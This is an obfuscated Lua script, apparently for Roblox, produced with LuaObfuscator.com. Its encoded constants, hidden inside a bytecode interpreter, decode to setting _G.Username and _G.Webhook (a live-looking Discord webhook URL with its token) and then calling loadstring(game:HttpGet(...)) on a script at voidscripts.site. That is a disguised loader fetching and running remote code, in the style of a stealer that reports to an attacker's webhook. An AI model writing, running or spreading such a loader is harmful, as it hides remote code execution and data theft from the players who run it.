--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (2==v0) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (4==v0) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v0=5;end if (v0==3) then v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=4;end if (5==v0) then v16=nil;v16=function(v25,v26,...)local v27=1;local v28;v25=v5(v4(v25,5),"..",function(v29)if (v2(v29,2)==79) then v28=v1(v4(v29,1,1));return "";else local v82=v3(v1(v29,16));if v28 then local v85=v6(v82,v28);v28=nil;return v85;else return v82;end end end);local function v30(v31,v32,v33)if v33 then local v83=(v31/((6 -4)^(v32-(18 -(16 + 1)))))%((597 -(9 + 30 + 556))^(((v33-(526 -(218 + 307))) -(v32-((1 + 1) -(1 + 0)))) + (1874 -(709 + 1164)) + 0)) ;return v83-(v83%1) ;else local v84=(3 -1)^(v32-(3 -2)) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or (0 -0) ;end end local function v34()local v47=v2(v25,v27,v27);v27=v27 + 1 ;return v47;end local function v35()local v48,v49=v2(v25,v27,v27 + (5 -3) );v27=v27 + 2 ;return (v49 * (510 -254)) + v48 ;end local function v36()local v50,v51,v52,v53=v2(v25,v27,v27 + (1202 -(119 + 1081)) + 1 );v27=v27 + 3 + (39 -(37 + 1)) ;return (v53 * (64854997 -48077781)) + (v52 * (66622 -(1051 + 35))) + (v51 * (576 -(375 -(44 + 11)))) + v50 ;end local function v37()local v54=v36();local v55=v36();local v56=1 + 0 + 0 ;local v57=(v30(v55,3 -2 ,95 -75 ) * ((3 -(2 -1))^(383 -(93 + 258)))) + v54 ;local v58=v30(v55,7 + 14 ,(885 -(299 + 472)) -83 );local v59=((v30(v55,32)==(189 -(63 + 125))) and  -(1 + 0)) or (530 -(42 + 487)) ;if (v58==(20 -((19 -8) + 9))) then if (v57==(1918 -(1240 + 678))) then return v59 * (1856 -(31 + 1825)) ;else v58=(1611 -(1217 + 393)) + 0 ;v56=0;end elseif (v58==2047) then return ((v57==(0 -0)) and (v59 * (1/(1384 -(1351 + 33))))) or (v59 * NaN) ;end return v9(v59,v58-1023 ) * (v56 + (v57/((1 + 1)^(1120 -(221 + 847))))) ;end local function v38(v39)local v60=1226 -(38 + 54 + 1134) ;local v61;local v62;while true do if ((1509 -(535 + 973))==v60) then v61=v4(v25,v27,(v27 + v39) -(1 + 0) );v27=v27 + v39 ;v60=1405 -((1726 -(390 + 732)) + 799) ;end if (v60==(0 + 0)) then v61=nil;if  not v39 then local v88=871 -(219 + 652) ;while true do if (v88==(0 -0)) then v39=v36();if (v39==(1652 -(1232 + 420))) then return "";end break;end end end v60=1 + 0 ;end if (((1569 -(210 + 267)) -(335 + 755))==v60) then v62={};for v86=450 -(337 + 112) , #v61 do v62[v86]=v3(v2(v4(v61,v86,v86)));end v60=3;end if (v60==(4 -(1 + 0))) then return v7(v62);end end end local v40=v36;local function v41(...)return {...},v13("#",...);end local function v42()local v63=0 + 0 ;local v64;local v65;local v66;local v67;local v68;local v69;local v70;local v71;local v72;while true do if (v63==(363 -(226 + 135))) then v68=nil;v69=nil;v63=6 -3 ;end if ((0 -0)==v63) then v64=0 -0 ;v65=nil;v63=811 -(454 + 356) ;end if (v63~=(6 -3)) then else v70=nil;v71=nil;v63=1111 -(145 + 962) ;end if (v63==(1 + 0)) then v66=nil;v67=nil;v63=2;end if (v63~=4) then else v72=nil;while true do if ((10 -6)==v64) then while true do if ((714 -(392 + 320))==v65) then v70=nil;v71=nil;v65=1 + 2 ;end if ((0 -0)~=v65) then else local v109=0 -0 ;local v110;while true do if (v109==(435 -(120 + 315))) then v110=289 -(114 + 175) ;while true do if (0==v110) then local v117=0;while true do if (0~=v117) then else v66=534 -(272 + 262) ;v67=nil;v117=2 -1 ;end if ((1 + 0)~=v117) then else v110=1 + 0 ;break;end end end if (v110==(1 + 0)) then v65=1 + 0 ;break;end end break;end end end if ((835 -(743 + 91))~=v65) then else local v111=0;while true do if (v111~=0) then else v68=nil;v69=nil;v111=943 -(906 + 36) ;end if (v111==(428 -(49 + 378))) then v65=695 -(342 + 351) ;break;end end end if (v65~=(1355 -(895 + 457))) then else v72=nil;while true do local v112=746 -(471 + 275) ;local v113;local v114;while true do if (1~=v112) then else while true do if (v113~=(0 + 0)) then else v114=0 + 0 ;while true do if (v114==(1 -0)) then if (v66~=(1 + 0)) then else local v139=0 -0 ;local v140;local v141;while true do if (v139~=(1291 -(898 + 393))) then else v140=0 + 0 ;v141=nil;v139=2 -1 ;end if (v139==(1 -0)) then while true do if (v140==(611 -(137 + 474))) then v141=0 + 0 ;while true do if (v141~=(0 -0)) then else local v169=0;while true do if (v169==(4 -3)) then v141=581 -(63 + 517) ;break;end if (v169==(0 + 0)) then v70={v67,v68,nil,v69};v71=v36();v169=1;end end end if (v141==(3 -2)) then v72={};v66=1 + 1 ;break;end end break;end end break;end end end if (v66==3) then local v142=0 -0 ;while true do local v143=0 -0 ;while true do if (v143==0) then if (v142~=(0 + 0)) then else local v162=32 -(5 + 27) ;local v163;while true do if ((1153 -(243 + 910))==v162) then v163=1548 -(729 + 819) ;while true do if (v163~=(0 + 0)) then else local v176=0 -0 ;while true do if (v176==0) then for v187=1 -0 ,v36() do v68[v187-(2 -1) ]=v42();end for v189=1 -0 ,v36() do v69[v189]=v36();end v176=1 -0 ;end if (v176==(1 + 0)) then v163=1 + 0 ;break;end end end if (v163==1) then v142=3 -2 ;break;end end break;end end end if (v142==(1579 -(159 + 1419))) then return v70;end break;end end end end break;end if (v114==(0 + 0)) then local v132=0;while true do if (v132~=1) then else v114=4 -3 ;break;end if (v132==(0 + 0)) then if (v66~=2) then else local v145=1348 -(537 + 811) ;while true do if (v145==1) then for v166=1,v36() do local v167=626 -(123 + 503) ;local v168;while true do if ((1414 -(448 + 966))==v167) then v168=v34();if (v30(v168,1,1 + 0 )==0) then local v177=0 + 0 ;local v178;local v179;local v180;local v181;local v182;while true do if (v177~=(0 -0)) then else v178=0 + 0 ;v179=nil;v177=761 -(242 + 518) ;end if (v177~=1) then else v180=nil;v181=nil;v177=2;end if (v177==(568 -(103 + 463))) then v182=nil;while true do if (v178==(1 -0)) then local v193=0 -0 ;while true do if (v193==0) then v181=nil;v182=nil;v193=923 -(402 + 520) ;end if (v193==(1 -0)) then v178=2;break;end end end if ((2 + 0)==v178) then while true do if (v179==(4 -2)) then local v195=0;while true do if (1==v195) then v179=3;break;end if (v195==0) then if (v30(v181,2 -1 ,1620 -(238 + 1381) )~=(1 + 0)) then else v182[2 + 0 ]=v72[v182[8 -6 ]];end if (v30(v181,1 + 1 ,957 -(5 + 950) )==(2 -1)) then v182[6 -3 ]=v72[v182[3]];end v195=1;end end end if (v179~=(0 -0)) then else local v196=526 -(385 + 141) ;while true do if (v196~=(1 + 0)) then else v179=368 -(218 + 149) ;break;end if (v196~=0) then else v180=v30(v168,2 + 0 ,8 -5 );v181=v30(v168,1059 -(358 + 697) ,17 -11 );v196=1 + 0 ;end end end if (v179~=(3 + 0)) then else if (v30(v181,538 -(252 + 283) ,918 -(499 + 416) )==1) then v182[634 -(13 + 617) ]=v72[v182[11 -7 ]];end v67[v166]=v182;break;end if (v179~=(1 + 0)) then else local v198=0 -0 ;while true do if (v198==(1655 -(1511 + 143))) then v179=2;break;end if (v198==(0 + 0)) then v182={v35(),v35(),nil,nil};if (v180==0) then local v205=1566 -(327 + 1239) ;local v206;while true do if ((0 -0)==v205) then v206=0 -0 ;while true do if (v206~=(0 + 0)) then else v182[263 -(218 + 42) ]=v35();v182[923 -(451 + 468) ]=v35();break;end end break;end end elseif (v180==(702 -(468 + 233))) then v182[2 + 1 ]=v36();elseif (v180==(1 + 1)) then v182[3]=v36() -((5 -3)^(5 + 11)) ;elseif (v180~=(151 -(21 + 127))) then else local v211=0;local v212;while true do if (v211==0) then v212=1130 -(592 + 538) ;while true do if ((0 + 0)~=v212) then else v182[10 -7 ]=v36() -((1 + 1)^16) ;v182[5 -1 ]=v35();break;end end break;end end end v198=4 -3 ;end end end end break;end if (0==v178) then v179=309 -(61 + 248) ;v180=nil;v178=3 -2 ;end end break;end end end break;end end end v66=10 -7 ;break;end if (v145==(0 -0)) then local v164=0 + 0 ;while true do if (v164==(4 -3)) then v145=1;break;end if (v164==(0 -0)) then for v171=1,v71 do local v172=1370 -(407 + 963) ;local v173;local v174;local v175;while true do if (v172~=(0 + 0)) then else v173=0 + 0 ;v174=nil;v172=1;end if (v172==1) then v175=nil;while true do if (v173==(0 -0)) then local v191=1603 -(497 + 1106) ;while true do if (v191==0) then v174=v34();v175=nil;v191=1 -0 ;end if (v191~=(346 -(206 + 139))) then else v173=3 -2 ;break;end end end if (v173==(645 -(570 + 74))) then if (v174==(204 -(67 + 136))) then v175=v34()~=0 ;elseif (v174==(1 + 1)) then v175=v37();elseif (v174==(792 -(505 + 284))) then v175=v38();end v72[v171]=v175;break;end end break;end end end v70[3]=v34();v164=1 + 0 ;end end end end end if (v66==0) then local v146=1152 -(110 + 1042) ;local v147;local v148;while true do if (v146==(2 -1)) then while true do if (v147~=(0 -0)) then else v148=0;while true do if (v148~=(1288 -(1219 + 69))) then else local v183=0;local v184;while true do if (v183~=(0 + 0)) then else v184=0;while true do if (v184~=(0 -0)) then else local v194=0 -0 ;while true do if (v194~=0) then else v67={};v68={};v194=1 + 0 ;end if (v194~=1) then else v184=1 -0 ;break;end end end if (v184==(1 -0)) then v148=2 -1 ;break;end end break;end end end if (v148==(1 -0)) then v69={};v66=1;break;end end break;end end break;end if (v146~=(0 -0)) then else v147=0 + 0 ;v148=nil;v146=2 -1 ;end end end v132=1 + 0 ;end end end end break;end end break;end if (v112~=(0 + 0)) then else v113=0 -0 ;v114=nil;v112=1;end end end break;end end break;end if (v64~=(1821 -(1143 + 677))) then else v67=nil;v68=nil;v64=2;end if (3==v64) then v71=nil;v72=nil;v64=244 -(98 + 142) ;end if (v64~=(1 + 1)) then else local v99=551 -(541 + 10) ;while true do if (v99==(4 -3)) then v64=14 -11 ;break;end if (v99~=(0 + 0)) then else v69=nil;v70=nil;v99=575 -(47 + 527) ;end end end if (v64==(1972 -(1861 + 111))) then v65=0 + 0 ;v66=nil;v64=1 -0 ;end end break;end end end local function v43(v44,v45,v46)local v73=v44[1];local v74=v44[2];local v75=v44[3];return function(...)local v76=0;local v77;local v78;local v79;local v80;local v81;while true do if (v76==2) then v81=nil;v81=function()local v89=v73;local v90=v74;local v91=v75;local v92=v41;local v93={};local v94={};local v95={};for v100=0 -(0 -0) ,v80 do if ((v100>=v91) or ((2156 -843)<(106 + 250))) then v93[v100-v91 ]=v79[v100 + 1 + 0 ];else v95[v100]=v79[v100 + (1 -0) ];end end local v96=(v80-v91) + (3 -2) ;local v97;local v98;while true do local v101=0 + 0 ;local v102;while true do if ((v101==(0 -0)) or ((3166 -1361)>=(6779 -3893))) then v102=0 + 0 ;while true do if ((v102==((1830 -(161 + 1668)) + 0)) or ((5011 -2948)==((5733 + 10309) -11577))) then if ((((3193 -2513) + (4825 -(926 + 887)))>=(12185 -9486)) and (v98<=(9 -5))) then if ((v98<=(2 -(1 + 0))) or ((5953 -4458)>(5868 -4203))) then if ((v98==(0 + 0)) or ((2182 -1496)==(18404 -13408))) then local v118=133 -(31 + 102) ;local v119;local v120;local v121;while true do if (((0 + 0)==v118) or ((3981 + 466)<=(2493 -1510))) then v119=0 + 0 ;v120=nil;v118=1;end if ((v118==1) or ((1353 -(269 + 53))>(1023 + 135))) then v121=nil;while true do if (((1206 -(540 + 665))==v119) or ((798 + 154)>=(4417 -((1330 -(975 + 154)) + 985)))) then v95[v120 + (2 -1) ]=v121;v95[v120]=v121[v97[6 -2 ]];break;end if ((v119==((0 -0) + 0)) or ((3330 -(685 + 215))>=(6067 -2126))) then v120=v97[1 + 1 ];v121=v95[v97[2 + (1 -0) ]];v119=1 + 0 ;end end break;end end else v95[v97[2 + 0 ]]();end elseif (((7241 -(3455 -(161 + 171)))==4118) and (v98<=((933 + 49) -(534 + 446)))) then v95[v97[2 + (1915 -(579 + 1336)) ]][v97[1804 -(627 + 1174) ]]=v97[(2150 -(315 + 425)) -(1375 + 31) ];elseif (((1744 -(143 + 195 + 53))<(858 + 2131)) and (v98>(2 + 1))) then if ((v95[v97[2 + 0 ]]==v97[5 -1 ]) or ((4915 -3487)>=(2853 + 402))) then v77=v77 + (1991 -(472 + 1518)) ;else v77=v97[7 -4 ];end else v77=v97[811 -((1965 -(1427 + 94)) + 364) ];end elseif (((5661 -(1091 + 450))<=((25362 -18818) -(473 + 1229))) and (v98<=(23 -17))) then if ((v98==(13 -8)) or (((2453 + 1406) -2090)==(3970 -(588 + 86)))) then v95[v97[1 + 1 ]]=v97[2 + 1 + 0 ];else local v126=0 -0 ;local v127;local v128;local v129;local v130;local v131;while true do if (((165 + 1551)==(2526 -810)) and (v126==(375 -(110 + 265)))) then v127=0 + 0 ;v128=nil;v126=2 -1 ;end if ((v126==(2 + 0)) or (4946<((1149 -(459 + 154)) + 2206))) then v131=nil;while true do if ((v127==(1197 -(175 + 1021))) or ((5066 -(82 + 319))<(6320 -3466))) then local v154=901 -(684 + 129 + 88) ;while true do if (((2031 -(1513 + 189))<=(2552 + 2337)) and ((1673 -(96 + 1577))==v154)) then v78=(v130 + v128) -(707 -(397 + 309)) ;v131=0 + 0 ;v154=1;end if ((v154==(17 -(4 + 12))) or ((7999 -5217)>=3712)) then v127=2 -0 ;break;end end end if (((3289 -1202)<=(4352 -(1341 + 299))) and (v127==(1660 -(1168 + 492)))) then local v155=(53 -(52 + 1)) + 0 ;while true do if (((18 + 1593)>((59 + 362) -(945 -640))) and (v155==0)) then v128=v97[1962 -(686 + 1274) ];v129,v130=v92(v95[v128](v14(v95,v128 + ((647 -366) -(189 + 91)) ,v97[1899 -(1269 + 627) ])));v155=(4 -3) -0 ;end if (((361 + 3085)==(1578 + 1868)) and (v155==(2 -(1145 -(277 + 867))))) then v127=1 + 0 ;break;end end end if ((v127==(3 -1)) or ((4544 -((1583 -997) + 5))<=(7742 -4612))) then for v156=v128,v78 do local v157=0 -0 ;local v158;local v159;while true do if (((13 + 1252)>(615 -(52 + 70))) and (v157==(1 + 0))) then while true do if ((v158==(0 -0)) or ((10634 -7889)>=(17096 -12617))) then v159=95 -(49 + 46) ;while true do if ((v159==(0 + 0)) or ((10534 -6645)<=(1246 + 1015))) then v131=v131 + 1 ;v95[v156]=v129[v131];break;end end break;end end break;end if (((447 + 276)<(681 + 576)) and (v157==((851 -495) -(198 + 158)))) then v158=0;v159=nil;v157=1 + 0 ;end end end break;end end break;end if ((v126==(1 -(0 + 0))) or ((2866 + 361)<(7559 -5427))) then v129=nil;v130=nil;v126=3 -1 ;end end end elseif (((191 + 3328)>=(2485 + 656)) and (v98<=((4 -1) + 4))) then do return;end elseif ((v98==(9 -1)) or ((1491 -(13 + 5))>=(5412 -2426))) then local v134=0 -0 ;local v135;local v136;while true do if (((1538 -(800 + 738))==v134) or ((1006 -777)>=(5511 -(386 + 317)))) then v135=0 -0 ;v136=nil;v134=907 -(54 + 852) ;end if ((v134==(1 -0)) or (2010>=((11816 -7659) -(8 + 14)))) then while true do if (((327 + 1399)>957) and (v135==(0 + 0))) then v136=v97[2 + 0 ];v95[v136]=v95[v136](v14(v95,v136 + (1316 -(853 + 462)) ,v78));break;end end break;end end else v95[v97[757 -(520 + 235) ]]=v46[v97[(985 -(300 + 683)) + 1 ]];end v77=v77 + (925 -(569 + 355)) ;break;end if (((4976 -(470 + 440))>=((5022 -3257) -(990 + 74))) and (v102==(0 -0))) then v97=v89[v77];v98=v97[(1154 -(675 + 478)) + 0 ];v102=4 -3 ;end end break;end end end end;v76=3;end if (v76==0) then v77=1;v78= -1;v76=1;end if (v76==3) then A,B=v41(v12(v81));if  not A[1] then local v103=0;local v104;while true do if (v103==0) then v104=v44[4][v77] or "?" ;error("Script error at ["   .. v104   .. "]:"   .. A[2] );break;end end else return v14(A,2,B);end break;end if (v76==1) then v79={...};v80=v13("#",...) -1 ;v76=2;end end end;end return v43(v42(),{},v26)(...);end;v16("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574032E3O00682O7470733A2O2F766F6964736372697074732E736974652F736372697074732F6D622F7363726970742E6C756103023O005F4703083O00557365726E616D65030B3O004E617468696E6F5F70726F03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313037353934333035373631363238393836332F706557395F36356E642O6A3759436B547042434B73744B4357374F6D4C74597253344832677138557552397445594D34505639364B614950617653776B66726C6A51496A00143O0012053O00013O0026043O000B000100020004033O000B0001001209000100033O001209000200043O00202O000200020005001205000400064O0006000200044O000800013O00022O00010001000100010004033O001300010026043O0001000100010004033O00010001001209000100073O003002000100080009001209000100073O0030020001000A000B0012053O00023O0004033O000100012O00073O00017O00143O00023O00043O00043O00053O00053O00053O00053O00053O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000B3O000C3O000E3O00",v10(),...);break;end end end
